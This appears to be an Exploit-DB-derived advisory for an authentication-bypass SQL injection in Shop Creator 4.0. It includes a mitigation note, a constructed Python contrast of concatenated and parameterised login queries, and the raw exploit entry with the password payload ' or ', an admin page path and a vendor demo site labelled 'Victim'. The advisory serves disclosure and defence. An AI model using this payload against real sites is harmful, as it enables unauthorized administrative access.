Vendor: Shop Creator
By: Pouya_Server
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Shop Creator
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: N/A
Related CWE: N/A
CPE: a:etoshop:shop_creator:4.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

Auth Bypass SQL Injection Vulnerability

An authentication bypass vulnerability exists in Shop Creator 4.0 due to improper validation of user-supplied input. An attacker can exploit it to bypass authentication and gain access to the admin page. The advisory's example logs in with the username 'pouya' and the password ' or '.

Mitigation:

Input validation should be performed to ensure that untrusted data is not used to bypass authentication.
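
The mitigation above, as an added example that is not part of the original advisory or the vendor's code: a login check where the username is a bound parameter and the password never enters the SQL text, shown beside the string-concatenation pattern for contrast. Python and an in-memory SQLite database stand in for the ASP application, whose real query is not shown on this page; the table, column names and stored password are constructed.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 100_000  # PBKDF2 work factor, a value picked for this example


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one admin account in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO admins VALUES (?, ?, ?)",
                 ("pouya", salt, hash_password("correct horse", salt)))
    return conn


def concatenated_sql(username: str, password: str) -> str:
    """The vulnerable pattern (assumed, not the vendor's query): input is pasted
    into the statement text, so a quote in the input ends the string literal.
    Returned for inspection only; it is never executed here."""
    return ("SELECT 1 FROM admins WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened check: username is bound with ?, password is verified in code."""
    row = conn.execute("SELECT salt, pw_hash FROM admins WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(stored, hash_password(password, salt))


if __name__ == "__main__":
    db = make_db()
    print(concatenated_sql("pouya", "' or '"))  # input has become SQL syntax
    print(login(db, "pouya", "' or '"))         # treated as a wrong password
    print(login(db, "pouya", "correct horse"))
```

Whether the concatenated statement actually returns a row depends on the database engine and the application's real query; the bound-parameter version is unaffected either way because the input never changes the statement's structure.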

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: Shop Creator
Version: 4.0
Vendor: http://www.etoshop.com
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Website: http://Pouya-Server.ir
Vulnerability : (Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------
#########################################################
[Auth Bypass]:
user: pouya
pass: ' or '
admin page : http://site.com/[path]/admin.asp
---------------------------------
Victim :
http://www.etoshop.com/demo/pcstore
---------------------------------------------------------
#########################################################